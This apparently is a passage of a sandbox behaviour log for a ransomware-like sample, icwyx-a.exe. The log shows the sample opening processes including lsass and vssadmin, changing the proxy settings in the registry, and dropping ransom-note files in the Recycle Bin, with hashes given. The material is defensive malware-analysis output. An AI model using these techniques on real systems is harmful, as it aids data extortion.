  1346.    
  1347. 904
  1348. 328
  1349.          
  1350. Process
  1351. Opened
  1352.    
  1353.  
  1354. Target:   C:\Windows\System32\spoolsv.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1355.    
  1356. 968
  1357. 328
  1358.          
  1359. Process
  1360. Opened
  1361.    
  1362.  
  1363. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1364.    
  1365. 1064
  1366. 328
  1367.          
  1368. Process
  1369. Opened
  1370.    
  1371.  
  1372. Target:   C:\Windows\System32\taskhost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1373.    
  1374. 1164
  1375. 328
  1376.          
  1377. Process
  1378. Opened
  1379.    
  1380.  
  1381. Target:   C:\Windows\System32\dwm.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1382.    
  1383. 1244
  1384. 328
  1385.          
  1386. Process
  1387. Opened
  1388.    
  1389.  
  1390. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1391.    
  1392. 1340
  1393. 328
  1394.          
  1395. Process
  1396. Opened
  1397.    
  1398.  
  1399. Target:   C:\Windows\explorer.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1400.    
  1401. 1092
  1402. 328
  1403.          
  1404. Process
  1405. Opened
  1406.    
  1407.  
  1408. Target:   C:\Windows\System32\wbem\WmiPrvSE.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1409.    
  1410. 940
  1411. 328
  1412.          
  1413. Process
  1414. Opened
  1415.    
  1416.  
  1417. Target:   C:\Program Files\Internet Explorer\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1418.    
  1419. 1976
  1420. 328
  1421.          
  1422. Process
  1423. Opened
  1424.    
  1425.  
  1426. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1427.    
  1428. 384
  1429. 328
  1430.          
  1431. Process
  1432. Opened
  1433.    
  1434.  
  1435. Target:   C:\Program Files (x86)\Internet Explorer\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1436.    
  1437. 1460
  1438. 328
  1439.          
  1440. Process
  1441. Opened
  1442.    
  1443.  
  1444. Target:   C:\Program Files (x86)\Internet Explorer\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1445.    
  1446. 1312
  1447. 328
  1448.          
  1449. Process
  1450. Opened
  1451.    
  1452.  
  1453. Target:   C:\Program Files (x86)\Internet Explorer9\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1454.    
  1455. 1324
  1456. 328
  1457.          
  1458. Process
  1459. Opened
  1460.    
  1461.  
  1462. Target:   C:\Program Files (x86)\Internet Explorer9\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1463.    
  1464. 1852
  1465. 328
  1466.          
  1467. Process
  1468. Opened
  1469.    
  1470.  
  1471. Target:   C:\Windows\System32\wbem\WmiPrvSE.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1472.    
  1473. 2056
  1474. 328
  1475.          
  1476. Process
  1477. Opened
  1478.    
  1479.  
  1480. Target:   C:\Windows\System32\taskhost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1481.    
  1482. 2220
  1483. 328
  1484.          
  1485. Process
  1486. Opened
  1487.    
  1488.  
  1489. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1490.    
  1491. 2456
  1492. 328
  1493.          
  1494. Process
  1495. Opened
  1496.    
  1497.  
  1498. Target:   C:\Windows\System32\vssadmin.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1499.    
  1500. 2336
  1501. 328
  1502.          
  1503. Process
  1504. Opened
  1505.    
  1506.  
  1507. Target:   C:\Windows\System32\conhost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1508.    
  1509. 2168
  1510. 328
  1511.          
  1512. API Call   
  1513.    
  1514.  API Name:  GetVolumeNameForVolumeMountPointW   Address:  0x76220e20
  1515.  Params:  [NULL, \\?\Volume{a4dcb965-c2b8-11e2-8b83-806e6f6e6963}\]
  1516.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  1517.     328      
  1518. API Call   
  1519.    
  1520.  API Name:  GetVolumeNameForVolumeMountPointW   Address:  0x76220e20
  1521.  Params:  [NULL, \\?\Volume{a4dcb962-c2b8-11e2-8b83-806e6f6e6963}\]
  1522.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  1523.     328      
  1524. File   
  1525. Failed
  1526.    
  1527. C:\Users\Administrator\AppData\Roaming\IPHLPAPI.DLL
  1528.     328      
  1529. File   
  1530. Failed
  1531.    
  1532. C:\Users\Administrator\AppData\Roaming\WINNSI.DLL
  1533.     328      
  1534. File   
  1535. Failed
  1536.    
  1537. C:\Users\Administrator\AppData\Roaming\API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL
  1538.     328      
  1539. Process
  1540. Opened
  1541.    
  1542.  
  1543. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1544.    
  1545. 4
  1546. 328
  1547.          
  1548. Process
  1549. Opened
  1550.    
  1551.  
  1552. Target:   C:\Windows\System32\smss.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1553.    
  1554. 264
  1555. 328
  1556.          
  1557. Process
  1558. Opened
  1559.    
  1560.  
  1561. Target:   C:\Windows\System32\csrss.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1562.    
  1563. 348
  1564. 328
  1565.          
  1566. Process
  1567. Opened
  1568.    
  1569.  
  1570. Target:   C:\Windows\System32\wininit.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1571.    
  1572. 376
  1573. 328
  1574.          
  1575. Process
  1576. Opened
  1577.    
  1578.  
  1579. Target:   C:\Windows\System32\csrss.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1580.    
  1581. 396
  1582. 328
  1583.          
  1584. Process
  1585. Opened
  1586.    
  1587.  
  1588. Target:   C:\Windows\System32\winlogon.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1589.    
  1590. 432
  1591. 328
  1592.          
  1593. Process
  1594. Opened
  1595.    
  1596.  
  1597. Target:   C:\Windows\System32\services.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1598.    
  1599. 476
  1600. 328
  1601.          
  1602. Process
  1603. Opened
  1604.    
  1605.  
  1606. Target:   C:\Windows\System32\lsass.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1607.    
  1608. 492
  1609. 328
  1610.          
  1611. Process
  1612. Opened
  1613.    
  1614.  
  1615. Target:   C:\Windows\System32\lsm.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1616.    
  1617. 500
  1618. 328
  1619.          
  1620. Process
  1621. Opened
  1622.    
  1623.  
  1624. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1625.    
  1626. 612
  1627. 328
  1628.          
  1629. Process
  1630. Opened
  1631.    
  1632.  
  1633. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1634.    
  1635. 684
  1636. 328
  1637.          
  1638. Process
  1639. Opened
  1640.    
  1641.  
  1642. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1643.    
  1644. 756
  1645. 328
  1646.          
  1647. Process
  1648. Opened
  1649.    
  1650.  
  1651. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1652.    
  1653. 828
  1654. 328
  1655.          
  1656. Process
  1657. Opened
  1658.    
  1659.  
  1660. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1661.    
  1662. 868
  1663. 328
  1664.          
  1665. Process
  1666. Opened
  1667.    
  1668.  
  1669. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1670.    
  1671. 904
  1672. 328
  1673.          
  1674. Process
  1675. Opened
  1676.    
  1677.  
  1678. Target:   C:\Windows\System32\spoolsv.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1679.    
  1680. 968
  1681. 328
  1682.          
  1683. Process
  1684. Opened
  1685.    
  1686.  
  1687. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1688.    
  1689. 1064
  1690. 328
  1691.          
  1692. Process
  1693. Opened
  1694.    
  1695.  
  1696. Target:   C:\Windows\System32\taskhost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1697.    
  1698. 1164
  1699. 328
  1700.          
  1701. Process
  1702. Opened
  1703.    
  1704.  
  1705. Target:   C:\Windows\System32\dwm.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1706.    
  1707. 1244
  1708. 328
  1709.          
  1710. Process
  1711. Opened
  1712.    
  1713.  
  1714. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1715.    
  1716. 1340
  1717. 328
  1718.          
  1719. Process
  1720. Opened
  1721.    
  1722.  
  1723. Target:   C:\Windows\explorer.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1724.    
  1725. 1092
  1726. 328
  1727.          
  1728. Process
  1729. Opened
  1730.    
  1731.  
  1732. Target:   C:\Windows\System32\wbem\WmiPrvSE.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1733.    
  1734. 940
  1735. 328
  1736.          
  1737. Process
  1738. Opened
  1739.    
  1740.  
  1741. Target:   C:\Program Files\Internet Explorer\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1742.    
  1743. 1976
  1744. 328
  1745.          
  1746. Process
  1747. Opened
  1748.    
  1749.  
  1750. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1751.    
  1752. 384
  1753. 328
  1754.          
  1755. Process
  1756. Opened
  1757.    
  1758.  
  1759. Target:   C:\Program Files (x86)\Internet Explorer\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1760.    
  1761. 1460
  1762. 328
  1763.          
  1764. Process
  1765. Opened
  1766.    
  1767.  
  1768. Target:   C:\Program Files (x86)\Internet Explorer\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1769.    
  1770. 1312
  1771. 328
  1772.          
  1773. Process
  1774. Opened
  1775.    
  1776.  
  1777. Target:   C:\Program Files (x86)\Internet Explorer9\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1778.    
  1779. 1324
  1780. 328
  1781.          
  1782. Process
  1783. Opened
  1784.    
  1785.  
  1786. Target:   C:\Program Files (x86)\Internet Explorer9\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1787.    
  1788. 1852
  1789. 328
  1790.          
  1791. Process
  1792. Opened
  1793.    
  1794.  
  1795. Target:   C:\Windows\System32\wbem\WmiPrvSE.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1796.    
  1797. 2056
  1798. 328
  1799.          
  1800. Process
  1801. Opened
  1802.    
  1803.  
  1804. Target:   C:\Windows\System32\taskhost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1805.    
  1806. 2220
  1807. 328
  1808.          
  1809. Process
  1810. Opened
  1811.    
  1812.  
  1813. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1814.    
  1815. 2456
  1816. 328
  1817.          
  1818. Process
  1819. Opened
  1820.    
  1821.  
  1822. Target:   C:\Windows\System32\vssadmin.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1823.    
  1824. 2336
  1825. 328
  1826.          
  1827. Process
  1828. Opened
  1829.    
  1830.  
  1831. Target:   C:\Windows\System32\conhost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1832.    
  1833. 2168
  1834. 328
  1835.          
  1836. Regkey 
  1837. Setval
  1838.    
  1839. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1840.   on\Internet Settings\"ProxyEnable" = 0x00000000
  1841.     328      
  1842. Regkey 
  1843. Setval
  1844.    
  1845. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1846.    on\Internet Settings\"ProxyServer" = 10.0.0.2:8080
  1847.     328      
  1848. Regkey 
  1849. Deleteval
  1850.    
  1851. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1852.   on\Internet Settings\"ProxyOverride"
  1853.     328      
  1854. Regkey 
  1855. Deleteval
  1856.    
  1857. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1858.    on\Internet Settings\"AutoConfigURL"
  1859.     328      
  1860. Regkey 
  1861. Deleteval
  1862.    
  1863. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1864.   on\Internet Settings\"AutoDetect"
  1865.     328      
  1866. Regkey 
  1867. Setval
  1868.    
  1869. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1870.    on\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 21 00 00 00 09 00 00 00 0d 0
  1871.   0 00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00
  1872.    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 0a 00 00 42 00
  1873.   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
  1874.   0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  1875.    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  1876.   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  1877.     328      
  1878. File   
  1879. Failed
  1880.    
  1881. C:\Users\Administrator\AppData\Roaming\DNSAPI.DLL
  1882.     328      
  1883. File   
  1884. Find
  1885.    
  1886. C:\*
  1887.     328      
  1888. File   
  1889. Find
  1890.    
  1891. C:\$Recycle.Bin\*
  1892.     328      
  1893. File   
  1894. Created
  1895.    
  1896. C:\$Recycle.Bin\S-1-5-21-2529703413-2662079939-3113469119-500\how_recover+sia.txt
  1897.     328      
  1898. File   
  1899. Close
  1900.    
  1901. C:\$Recycle.Bin\S-1-5-21-2529703413-2662079939-3113469119-500\how_recover+sia.txt
  1902.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  1903.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  1904.     328     2639
  1905. Regkey 
  1906. Setval
  1907.    
  1908. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1909.   on\Internet Settings\5.0\Cache\Content\"CachePrefix" =
  1910.     328      
  1911. File   
  1912. Failed
  1913.    
  1914. C:\Users\Administrator
  1915.     328      
  1916. File   
  1917. Failed
  1918.    
  1919. C:\Users\Administrator\AppData\Local
  1920.     328      
  1921. File   
  1922. Failed
  1923.    
  1924. C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files
  1925.     328      
  1926. Regkey 
  1927. Setval
  1928.    
  1929. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1930.    on\Internet Settings\5.0\Cache\Cookies\"CachePrefix" = Cookie:
  1931.     328      
  1932. File   
  1933. Failed
  1934.    
  1935. C:\Users\Administrator\AppData\Roaming
  1936.     328      
  1937. File   
  1938. Failed
  1939.    
  1940. C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
  1941.     328      
  1942. Regkey 
  1943. Setval
  1944.    
  1945. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1946.   on\Internet Settings\5.0\Cache\History\"CachePrefix" = Visited:
  1947.     328      
  1948. File   
  1949. Failed
  1950.    
  1951. C:\Users\Administrator\AppData\Local\Microsoft\Windows\History
  1952.     328      
  1953. File   
  1954. Created
  1955.    
  1956. C:\$Recycle.Bin\S-1-5-21-2529703413-2662079939-3113469119-500\how_recover+sia.html
  1957.     328      
  1958. File   
  1959. Close
  1960.    
  1961. C:\$Recycle.Bin\S-1-5-21-2529703413-2662079939-3113469119-500\how_recover+sia.html
  1962.   MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  1963.   SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  1964.     328     9372
  1965. File   
  1966. Created
  1967.    
  1968. C:\$Recycle.Bin\how_recover+sia.txt
  1969.     328      
  1970. File   
  1971. Close
  1972.    
  1973. C:\$Recycle.Bin\how_recover+sia.txt
  1974.   MD5:  dfd795e9766d0000c6b098809bd6eb64
  1975.   SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  1976.     328     2639
  1977. Regkey 
  1978. Queryvalue
  1979.    
  1980. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  1981.     2336         
  1982. File   
  1983. Created
  1984.    
  1985. C:\$Recycle.Bin\how_recover+sia.html
  1986.     328      
  1987. File   
  1988. Close
  1989.    
  1990. C:\$Recycle.Bin\how_recover+sia.html
  1991.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  1992.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  1993.     328     9372
  1994. Process
  1995. Opened
  1996.    
  1997.  
  1998. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1999.    
  2000. 4
  2001. 328
  2002.          
  2003. Process
  2004. Opened
  2005.    
  2006.  
  2007. Target:   C:\Windows\System32\smss.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2008.    
  2009. 264
  2010. 328
  2011.          
  2012. Process
  2013. Opened
  2014.    
  2015.  
  2016. Target:   C:\Windows\System32\csrss.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2017.    
  2018. 348
  2019. 328
  2020.          
  2021. Process
  2022. Opened
  2023.    
  2024.  
  2025. Target:   C:\Windows\System32\wininit.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2026.    
  2027. 376
  2028. 328
  2029.          
  2030. Process
  2031. Opened
  2032.    
  2033.  
  2034. Target:   C:\Windows\System32\csrss.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2035.    
  2036. 396
  2037. 328
  2038.          
  2039. Process
  2040. Opened
  2041.    
  2042.  
  2043. Target:   C:\Windows\System32\winlogon.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2044.    
  2045. 432
  2046. 328
  2047.          
  2048. Process
  2049. Opened
  2050.    
  2051.  
  2052. Target:   C:\Windows\System32\services.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2053.    
  2054. 476
  2055. 328
  2056.          
  2057. Process
  2058. Opened
  2059.    
  2060.  
  2061. Target:   C:\Windows\System32\lsass.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2062.    
  2063. 492
  2064. 328
  2065.          
  2066. Process
  2067. Opened
  2068.    
  2069.  
  2070. Target:   C:\Windows\System32\lsm.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2071.    
  2072. 500
  2073. 328
  2074.          
  2075. Process
  2076. Opened
  2077.    
  2078.  
  2079. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2080.    
  2081. 612
  2082. 328
  2083.          
  2084. Process
  2085. Opened
  2086.    
  2087.  
  2088. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2089.    
  2090. 684
  2091. 328
  2092.          
  2093. Process
  2094. Opened
  2095.    
  2096.  
  2097. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2098.    
  2099. 756
  2100. 328
  2101.          
  2102. Process
  2103. Opened
  2104.    
  2105.  
  2106. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2107.    
  2108. 828
  2109. 328
  2110.          
  2111. Process
  2112. Opened
  2113.    
  2114.  
  2115. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2116.    
  2117. 868
  2118. 328
  2119.          
  2120. Process
  2121. Opened
  2122.    
  2123.  
  2124. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2125.    
  2126. 904
  2127. 328
  2128.          
  2129. Process
  2130. Opened
  2131.    
  2132.  
  2133. Target:   C:\Windows\System32\spoolsv.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2134.    
  2135. 968
  2136. 328
  2137.          
  2138. Process
  2139. Opened
  2140.    
  2141.  
  2142. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2143.    
  2144. 1064
  2145. 328
  2146.          
  2147. Process
  2148. Opened
  2149.    
  2150.  
  2151. Target:   C:\Windows\System32\taskhost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2152.    
  2153. 1164
  2154. 328
  2155.          
  2156. Process
  2157. Opened
  2158.    
  2159.  
  2160. Target:   C:\Windows\System32\dwm.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2161.    
  2162. 1244
  2163. 328
  2164.          
  2165. Process
  2166. Opened
  2167.    
  2168.  
  2169. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2170.    
  2171. 1340
  2172. 328
  2173.          
  2174. Process
  2175. Opened
  2176.    
  2177.  
  2178. Target:   C:\Windows\explorer.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2179.    
  2180. 1092
  2181. 328
  2182.          
  2183. Process
  2184. Opened
  2185.    
  2186.  
  2187. Target:   C:\Windows\System32\wbem\WmiPrvSE.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2188.    
  2189. 940
  2190. 328
  2191.          
  2192. Process
  2193. Opened
  2194.    
  2195.  
  2196. Target:   C:\Program Files\Internet Explorer\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2197.    
  2198. 1976
  2199. 328
  2200.          
  2201. Process
  2202. Opened
  2203.    
  2204.  
  2205. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2206.    
  2207. 384
  2208. 328
  2209.          
  2210. Process
  2211. Opened
  2212.    
  2213.  
  2214. Target:   C:\Program Files (x86)\Internet Explorer\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2215.    
  2216. 1460
  2217. 328
  2218.          
  2219. Process
  2220. Opened
  2221.    
  2222.  
  2223. Target:   C:\Program Files (x86)\Internet Explorer\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2224.    
  2225. 1312
  2226. 328
  2227.          
  2228. Process
  2229. Opened
  2230.    
  2231.  
  2232. Target:   C:\Program Files (x86)\Internet Explorer9\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2233.    
  2234. 1324
  2235. 328
  2236.          
  2237. Process
  2238. Opened
  2239.    
  2240.  
  2241. Target:   C:\Program Files (x86)\Internet Explorer9\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2242.    
  2243. 1852
  2244. 328
  2245.          
  2246. Process
  2247. Opened
  2248.    
  2249.  
  2250. Target:   C:\Windows\System32\wbem\WmiPrvSE.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2251.    
  2252. 2056
  2253. 328
  2254.          
  2255. Process
  2256. Opened
  2257.    
  2258.  
  2259. Target:   C:\Windows\System32\taskhost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2260.    
  2261. 2220
  2262. 328
  2263.          
  2264. Process
  2265. Opened
  2266.    
  2267.  
  2268. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2269.    
  2270. 2456
  2271. 328
  2272.          
  2273. Process
  2274. Opened
  2275.    
  2276.  
  2277. Target:   C:\Windows\System32\vssadmin.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2278.    
  2279. 2336
  2280. 328
  2281.          
  2282. Process
  2283. Opened
  2284.    
  2285.  
  2286. Target:   C:\Windows\System32\conhost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2287.    
  2288. 2168
  2289. 328
  2290.          
  2291. File   
  2292. Failed
  2293.    
  2294. C:\Users\Administrator\AppData\Roaming\DHCPCSVC6.DLL
  2295.     328      
  2296. File   
  2297. Failed
  2298.    
  2299. C:\Users\Administrator\AppData\Roaming\RPCRTREMOTE.DLL
  2300.     328      
  2301. Process
  2302. Opened
  2303.    
  2304.  
  2305. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2306.    
  2307. 4
  2308. 328
  2309.          
  2310. Process
  2311. Opened
  2312.    
  2313.  
  2314. Target:   C:\Windows\System32\smss.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2315.    
  2316. 264
  2317. 328
  2318.          
  2319. Process
  2320. Opened
  2321.    
  2322.  
  2323. Target:   C:\Windows\System32\csrss.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2324.    
  2325. 348
  2326. 328
  2327.          
  2328. Process
  2329. Opened
  2330.    
  2331.  
  2332. Target:   C:\Windows\System32\wininit.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2333.    
  2334. 376
  2335. 328
  2336.          
  2337. Process
  2338. Opened
  2339.    
  2340.  
  2341. Target:   C:\Windows\System32\csrss.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2342.    
  2343. 396
  2344. 328
  2345.          
  2346. Process
  2347. Opened
  2348.    
  2349.  
  2350. Target:   C:\Windows\System32\winlogon.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2351.    
  2352. 432
  2353. 328
  2354.          
  2355. Process
  2356. Opened
  2357.    
  2358.  
  2359. Target:   C:\Windows\System32\services.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2360.    
  2361. 476
  2362. 328
  2363.          
  2364. Process
  2365. Opened
  2366.    
  2367.  
  2368. Target:   C:\Windows\System32\lsass.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2369.    
  2370. 492
  2371. 328
  2372.          
  2373. Process
  2374. Opened
  2375.    
  2376.  
  2377. Target:   C:\Windows\System32\lsm.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2378.    
  2379. 500
  2380. 328
  2381.          
  2382. Process
  2383. Opened
  2384.    
  2385.  
  2386. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2387.    
  2388. 612
  2389. 328
  2390.          
  2391. Process
  2392. Opened
  2393.    
  2394.  
  2395. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2396.    
  2397. 684
  2398. 328
  2399.          
  2400. Process
  2401. Opened
  2402.    
  2403.  
  2404. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2405.    
  2406. 756
  2407. 328
  2408.          
  2409. Process
  2410. Opened
  2411.    
  2412.  
  2413. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2414.    
  2415. 828
  2416. 328
  2417.          
  2418. Process
  2419. Opened
  2420.    
  2421.  
  2422. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2423.    
  2424. 868
  2425. 328
  2426.          
  2427. Process
  2428. Opened
  2429.    
  2430.  
